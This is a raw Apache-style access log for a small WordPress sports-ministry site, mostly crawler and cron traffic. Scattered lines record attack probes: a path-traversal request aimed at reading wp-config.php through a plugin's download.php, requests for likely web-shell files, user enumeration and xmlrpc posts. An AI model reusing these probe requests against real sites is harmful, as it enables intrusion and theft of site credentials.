10.247.24.59 - - [21/Sep/2022:17:24:04 -0700] "POST /wp-cron.php?doing_wp_cron=1663806244.6566898822784423828125 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663806244.6566898822784423828125" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
207.46.13.148 - - [21/Sep/2022:17:24:00 -0700] "GET /blog/index.php/comments/feed/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "jsdsportsdevelopment.org"
185.191.171.15 - - [21/Sep/2022:17:55:22 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "jsdsportsdevelopment.org"
10.247.24.58 - - [21/Sep/2022:17:55:25 -0700] "POST /wp-cron.php?doing_wp_cron=1663808125.7347469329833984375000 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663808125.7347469329833984375000" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
185.191.171.22 - - [21/Sep/2022:17:55:22 -0700] "GET /blog/index.php/ministry/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:09 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:12 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:14 -0700] "GET /sitemap HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:16 -0700] "GET /sitemap HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:20 -0700] "GET /sitemap.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:24 -0700] "GET /sitemap.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:28 -0700] "GET /?C=D;O=A HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:33 -0700] "GET /?C=M;O=A HTTP/1.1" 200 422 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:36 -0700] "GET /?C=N;O=D HTTP/1.1" 200 426 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:42 -0700] "GET /?C=S;O=A HTTP/1.1" 200 421 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
10.247.24.59 - - [21/Sep/2022:18:12:47 -0700] "POST /wp-cron.php?doing_wp_cron=1663809167.5437879562377929687500 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663809167.5437879562377929687500" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:44 -0700] "GET /blog/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:51 -0700] "GET /wp-content/ HTTP/1.1" 200 354 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [21/Sep/2022:18:12:54 -0700] "GET /wp-includes/ HTTP/1.1" 200 405 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
152.89.196.13 - - [21/Sep/2022:18:52:52 -0700] "GET /wp-admin/accesson.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "jsdsportsdevelopment.org"
20.212.81.47 - - [21/Sep/2022:19:25:06 -0700] "GET / HTTP/1.1" 200 1156 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "jsdsportsdevelopment.org"
20.212.81.47 - - [21/Sep/2022:19:25:07 -0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "jsdsportsdevelopment.org"
20.212.81.47 - - [21/Sep/2022:19:25:08 -0700] "GET /xmlrpc.php?rsd HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "jsdsportsdevelopment.org"
20.212.81.47 - - [21/Sep/2022:19:25:09 -0700] "GET / HTTP/1.1" 200 1156 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "jsdsportsdevelopment.org"
20.212.81.47 - - [21/Sep/2022:19:25:10 -0700] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1045 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "jsdsportsdevelopment.org"
10.247.24.58 - - [21/Sep/2022:19:25:14 -0700] "POST /wp-cron.php?doing_wp_cron=1663813514.3282170295715332031250 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663813514.3282170295715332031250" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
20.212.81.47 - - [21/Sep/2022:19:25:11 -0700] "GET /blog//?author=1 HTTP/1.1" 200 23436 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "jsdsportsdevelopment.org"
20.212.81.47 - - [21/Sep/2022:19:25:16 -0700] "GET /blog//?author=2 HTTP/1.1" 404 22431 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "jsdsportsdevelopment.org"
20.212.81.47 - - [21/Sep/2022:19:25:21 -0700] "GET /blog/index.php//wp-json/wp/v2/users/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "jsdsportsdevelopment.org"
20.212.81.47 - - [21/Sep/2022:19:25:24 -0700] "GET /blog/index.php//wp-json/oembed/1.0/embed?url=https://jsdsportsdevelopment.org//blog/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "jsdsportsdevelopment.org"
20.212.81.47 - - [21/Sep/2022:19:25:27 -0700] "POST /blog/index.php//xmlrpc.php HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "jsdsportsdevelopment.org"
167.114.209.104 - - [21/Sep/2022:19:41:08 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
10.247.24.59 - - [21/Sep/2022:19:41:17 -0700] "POST /wp-cron.php?doing_wp_cron=1663814477.1622500419616699218750 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663814477.1622500419616699218750" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
167.114.209.104 - - [21/Sep/2022:19:41:13 -0700] "GET /blog/index.php/comments/feed/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
147.78.47.249 - - [21/Sep/2022:19:47:28 -0700] "GET /_ignition/health-check/ HTTP/1.1" 404 88 "http://jsdsportsdevelopment.org/_ignition/health-check/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" "jsdsportsdevelopment.org"
147.78.47.249 - - [21/Sep/2022:19:47:31 -0700] "GET /public/_ignition/health-check/ HTTP/1.1" 404 88 "http://jsdsportsdevelopment.org/public/_ignition/health-check/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" "jsdsportsdevelopment.org"
147.78.47.249 - - [21/Sep/2022:19:47:33 -0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 88 "http://jsdsportsdevelopment.org/wp-includes/wlwmanifest.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" "jsdsportsdevelopment.org"
35.208.3.18 - - [21/Sep/2022:21:27:01 -0700] "HEAD / HTTP/1.1" 200 - "-" "scalaj-http/2.4.2" "jsdsportsdevelopment.org"
35.208.3.18 - - [21/Sep/2022:21:27:01 -0700] "GET / HTTP/1.1" 200 428 "-" "Buck/2.3.2; (+https://app.hypefactors.com/media-monitoring/about.html)" "jsdsportsdevelopment.org"
35.208.3.18 - - [21/Sep/2022:21:27:01 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Buck/2.3.2; (+https://app.hypefactors.com/media-monitoring/about.html)" "jsdsportsdevelopment.org"
35.208.3.18 - - [21/Sep/2022:21:27:01 -0700] "GET /sitemap.xml HTTP/1.1" 404 88 "-" "Buck/2.3.2; (+https://app.hypefactors.com/media-monitoring/about.html)" "jsdsportsdevelopment.org"
10.247.24.58 - - [21/Sep/2022:21:27:50 -0700] "POST /wp-cron.php?doing_wp_cron=1663820870.8128359317779541015625 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663820870.8128359317779541015625" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
35.208.3.18 - - [21/Sep/2022:21:27:46 -0700] "GET /blog/ HTTP/1.1" 200 28684 "-" "Buck/2.3.2; (+https://app.hypefactors.com/media-monitoring/about.html)" "jsdsportsdevelopment.org"
35.208.3.18 - - [21/Sep/2022:21:28:23 -0700] "GET /wp-content/ HTTP/1.1" 200 354 "-" "Buck/2.3.2; (+https://app.hypefactors.com/media-monitoring/about.html)" "jsdsportsdevelopment.org"
35.208.3.18 - - [21/Sep/2022:21:28:51 -0700] "GET /wp-includes/ HTTP/1.1" 200 405 "-" "Buck/2.3.2; (+https://app.hypefactors.com/media-monitoring/about.html)" "jsdsportsdevelopment.org"
35.208.3.18 - - [21/Sep/2022:21:29:15 -0700] "GET /index.html.bak HTTP/1.1" 200 867 "-" "Buck/2.3.2; (+https://app.hypefactors.com/media-monitoring/about.html)" "jsdsportsdevelopment.org"
114.119.130.111 - - [21/Sep/2022:22:08:50 -0700] "GET /wp-includes/php-compat/?C=D%3BO%3DA HTTP/1.1" 200 379 "https://jsdsportsdevelopment.org/wp-includes/php-compat/?C=S%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.130.111 - - [21/Sep/2022:22:38:31 -0700] "GET /wp-includes/?C=M%3BO%3DA HTTP/1.1" 200 405 "https://jsdsportsdevelopment.org/wp-includes/?C=N%3BO%3DD" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.141.100 - - [21/Sep/2022:22:45:06 -0700] "GET /wp-includes/blocks/comment-reply-link/block.json HTTP/1.1" 200 405 "https://jsdsportsdevelopment.org/wp-includes/blocks/comment-reply-link/?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
93.76.91.13 - - [21/Sep/2022:22:50:03 -0700] "GET / HTTP/1.1" 200 1156 "https://jsdsportsdevelopment.org/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "jsdsportsdevelopment.org"
159.89.129.171 - - [21/Sep/2022:22:50:38 -0700] "GET /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=../../../wp-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0" "jsdsportsdevelopment.org"
114.119.141.100 - - [21/Sep/2022:23:01:15 -0700] "GET /wp-includes/blocks/post-comments/style.min.css HTTP/1.1" 200 634 "https://jsdsportsdevelopment.org/wp-includes/blocks/post-comments/?C=S%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
10.247.24.60 - - [21/Sep/2022:23:06:29 -0700] "POST /wp-cron.php?doing_wp_cron=1663826789.0696470737457275390625 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663826789.0696470737457275390625" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
114.119.140.87 - - [21/Sep/2022:23:06:26 -0700] "GET /blog/wp-login.php?action=lostpassword HTTP/1.1" 200 3420 "http://jsdsportsdevelopment.org/blog/wp-login.php" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.87 - - [21/Sep/2022:23:11:35 -0700] "GET /wp-includes/?C=D%3BO%3DA HTTP/1.1" 200 405 "https://jsdsportsdevelopment.org/wp-includes/?C=N%3BO%3DD" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.141.100 - - [21/Sep/2022:23:16:47 -0700] "GET /wp-includes/blocks/navigation-submenu/?C=N%3BO%3DD HTTP/1.1" 200 456 "https://jsdsportsdevelopment.org/wp-includes/blocks/navigation-submenu/?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.87 - - [21/Sep/2022:23:21:56 -0700] "GET /wp-includes/blocks/navigation/style.min.css HTTP/1.1" 200 1995 "https://jsdsportsdevelopment.org/wp-includes/blocks/navigation/?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.141.100 - - [21/Sep/2022:23:27:08 -0700] "GET /wp-includes/css/dist/edit-site/style-rtl.min.css HTTP/1.1" 200 7900 "https://jsdsportsdevelopment.org/wp-includes/css/dist/edit-site/?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.99 - - [21/Sep/2022:23:32:19 -0700] "GET /?page_id=16 HTTP/1.1" 200 428 "https://jsdsportsdevelopment.org/blog/?page_id=109" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.130.111 - - [21/Sep/2022:23:37:28 -0700] "GET /wp-includes/blocks/post-author-biography/?C=N%3BO%3DD HTTP/1.1" 200 388 "https://jsdsportsdevelopment.org/wp-includes/blocks/post-author-biography/?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.99 - - [21/Sep/2022:23:42:40 -0700] "GET /wp-includes/blocks/ HTTP/1.1" 200 715 "https://jsdsportsdevelopment.org/wp-includes/blocks/post-author/?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
65.108.231.158 - - [21/Sep/2022:23:45:36 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
10.247.24.59 - - [21/Sep/2022:23:45:46 -0700] "POST /wp-cron.php?doing_wp_cron=1663829146.2890949249267578125000 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663829146.2890949249267578125000" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
65.108.231.158 - - [21/Sep/2022:23:45:42 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
114.119.141.100 - - [21/Sep/2022:23:47:52 -0700] "GET /wp-includes/blocks/query-no-results/?C=S%3BO%3DA HTTP/1.1" 200 389 "https://jsdsportsdevelopment.org/wp-includes/blocks/query-no-results/?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.87 - - [21/Sep/2022:23:53:03 -0700] "GET /wp-includes/blocks/post-author/?C=M%3BO%3DA HTTP/1.1" 200 456 "https://jsdsportsdevelopment.org/wp-includes/blocks/post-author/?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.99 - - [21/Sep/2022:23:58:18 -0700] "GET /wp-includes/blocks/comments-title/editor.min.css HTTP/1.1" 200 75 "https://jsdsportsdevelopment.org/wp-includes/blocks/comments-title/?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
185.191.171.40 - - [21/Sep/2022:23:58:40 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "jsdsportsdevelopment.org"
10.247.24.59 - - [21/Sep/2022:23:58:44 -0700] "POST /wp-cron.php?doing_wp_cron=1663829924.2183411121368408203125 HTTP/1.1" 500 1724 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663829924.2183411121368408203125" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
185.191.171.37 - - [21/Sep/2022:23:58:40 -0700] "GET /blog/index.php/mentoring/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "jsdsportsdevelopment.org"
114.119.140.99 - - [22/Sep/2022:00:03:25 -0700] "GET /wp-includes/blocks/term-description/?C=N%3BO%3DD HTTP/1.1" 200 379 "https://jsdsportsdevelopment.org/wp-includes/blocks/term-description/?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.130.111 - - [22/Sep/2022:00:08:36 -0700] "GET /wp-includes/blocks/comments-query-loop/?C=M%3BO%3DA HTTP/1.1" 200 459 "https://jsdsportsdevelopment.org/wp-includes/blocks/comments-query-loop/?C=S%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
152.89.196.13 - - [22/Sep/2022:00:13:28 -0700] "POST /wp-temp-ali.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" "jsdsportsdevelopment.org"
10.247.24.58 - - [22/Sep/2022:00:13:55 -0700] "POST /wp-cron.php?doing_wp_cron=1663830834.7812149524688720703125 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663830834.7812149524688720703125" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
114.119.140.87 - - [22/Sep/2022:00:13:50 -0700] "GET /blog/index.php/sports/soccer/ HTTP/1.1" 200 28684 "http://jsdsportsdevelopment.org/blog/mentoring/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.141.100 - - [22/Sep/2022:00:18:59 -0700] "GET /wp-content/?C=M%3BO%3DA HTTP/1.1" 200 354 "https://jsdsportsdevelopment.org/wp-content/?C=S%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.87 - - [22/Sep/2022:00:24:11 -0700] "GET /wp-includes/blocks/navigation/view.min.js HTTP/1.1" 200 2815 "https://jsdsportsdevelopment.org/wp-includes/blocks/navigation/?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
185.191.171.3 - - [22/Sep/2022:00:25:22 -0700] "GET /?page_id=14 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "jsdsportsdevelopment.org"
114.119.140.99 - - [22/Sep/2022:00:29:24 -0700] "GET /wp-includes/js/ HTTP/1.1" 200 359 "https://jsdsportsdevelopment.org/wp-includes/js/dist/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.130.111 - - [22/Sep/2022:00:34:41 -0700] "GET /?C=D%3BO%3DA HTTP/1.1" 200 428 "https://jsdsportsdevelopment.org?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
54.167.191.112 - - [22/Sep/2022:01:39:52 -0700] "GET / HTTP/1.1" 200 428 "-" "Apache-HttpClient/4.5.9 (Java/1.8.0_342)" "jsdsportsdevelopment.org"
10.247.24.60 - - [22/Sep/2022:01:52:30 -0700] "POST /wp-cron.php?doing_wp_cron=1663836750.5157289505004882812500 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663836750.5157289505004882812500" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
207.46.13.145 - - [22/Sep/2022:01:52:26 -0700] "GET /blog/index.php/after-school/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "jsdsportsdevelopment.org"
152.89.196.13 - - [22/Sep/2022:02:11:25 -0700] "GET /wp-post.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" "jsdsportsdevelopment.org"
65.108.2.171 - - [22/Sep/2022:02:48:01 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
65.108.2.171 - - [22/Sep/2022:02:48:03 -0700] "GET / HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
65.108.2.171 - - [22/Sep/2022:02:48:06 -0700] "GET /?feed=comments-rss2 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
65.108.2.171 - - [22/Sep/2022:02:48:08 -0700] "GET /?feed=rss2 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
65.108.2.171 - - [22/Sep/2022:02:48:10 -0700] "GET /?page_id=109 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
65.108.2.171 - - [22/Sep/2022:02:48:12 -0700] "GET /?page_id=14 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
65.108.2.171 - - [22/Sep/2022:02:48:14 -0700] "GET /?page_id=16 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
65.108.2.171 - - [22/Sep/2022:02:48:16 -0700] "GET /?page_id=20 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
65.108.2.171 - - [22/Sep/2022:02:48:18 -0700] "GET /?page_id=22 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
65.108.2.171 - - [22/Sep/2022:02:48:20 -0700] "GET /?page_id=24 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
157.245.77.246 - - [22/Sep/2022:03:09:55 -0700] "GET /inc.php?1473 HTTP/1.1" 404 73 "jsdsportsdevelopment.org" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36" "jsdsportsdevelopment.org"
157.245.77.246 - - [22/Sep/2022:03:09:59 -0700] "GET /wp-content/co.php?1476 HTTP/1.1" 404 73 "jsdsportsdevelopment.org" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36" "jsdsportsdevelopment.org"
